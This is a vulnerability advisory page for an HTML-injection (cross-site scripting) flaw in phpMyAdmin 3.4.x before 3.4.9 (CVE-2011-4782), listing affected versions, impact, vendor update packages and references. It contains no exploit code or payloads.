phpMyAdmin '$host' Variable HTML Injection Vulnerability
BID:51166
Info
phpMyAdmin '$host' Variable HTML Injection Vulnerability
| Bugtraq ID: | 51166 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-4782 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 22 2011 12:00AM |
| Updated: | Apr 13 2015 10:25PM |
| Credit: | Jason Leyrer of Trustwave SpiderLabs |
| Vulnerable: |
phpMyAdmin phpMyAdmin 3.4.8 phpMyAdmin phpMyAdmin 3.4.6 phpMyAdmin phpMyAdmin 3.4.5 phpMyAdmin phpMyAdmin 3.4.3 phpMyAdmin phpMyAdmin 3.4.5 phpMyAdmin phpMyAdmin 3.4.4 phpMyAdmin phpMyAdmin 3.4.3.2 phpMyAdmin phpMyAdmin 3.4.3.1 phpMyAdmin phpMyAdmin 3.4.1 phpMyAdmin phpMyAdmin 3.4.0-beta1 phpMyAdmin phpMyAdmin 3.4.0 MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 Gentoo Linux |
| Not Vulnerable: |
phpMyAdmin phpMyAdmin 3.4.9 |
Discussion
phpMyAdmin '$host' Variable HTML Injection Vulnerability
phpMyAdmin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
phpMyAdmin versions 3.4.x prior to 3.4.9 are affected.
phpMyAdmin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
phpMyAdmin versions 3.4.x prior to 3.4.9 are affected.
Exploit / POC
phpMyAdmin '$host' Variable HTML Injection Vulnerability
Attackers can use a browser to exploit this issue.
Attackers can use a browser to exploit this issue.
Solution / Fix
phpMyAdmin '$host' Variable HTML Injection Vulnerability
Solution:
Updates are available. Please see the references for more information.
MandrakeSoft Enterprise Server 5
MandrakeSoft Enterprise Server 5 x86_64
Solution:
Updates are available. Please see the references for more information.
MandrakeSoft Enterprise Server 5
-
Mandriva phpmyadmin-3.4.9-0.1mdvmes5.2.noarch.rpm
http://www.mandriva.com/en/downloads/
MandrakeSoft Enterprise Server 5 x86_64
-
Mandriva phpmyadmin-3.4.9-0.1mdvmes5.2.noarch.rpm
http://www.mandriva.com/en/downloads/
References
phpMyAdmin '$host' Variable HTML Injection Vulnerability
References:
References:
- Cross-Site Scripting Vulnerability in phpMyAdmin (Trustwave SpiderLabs)
- phpMyAdmin Homepage (phpMyAdmin)
- PMASA-2011-19 (phpMyAdmin)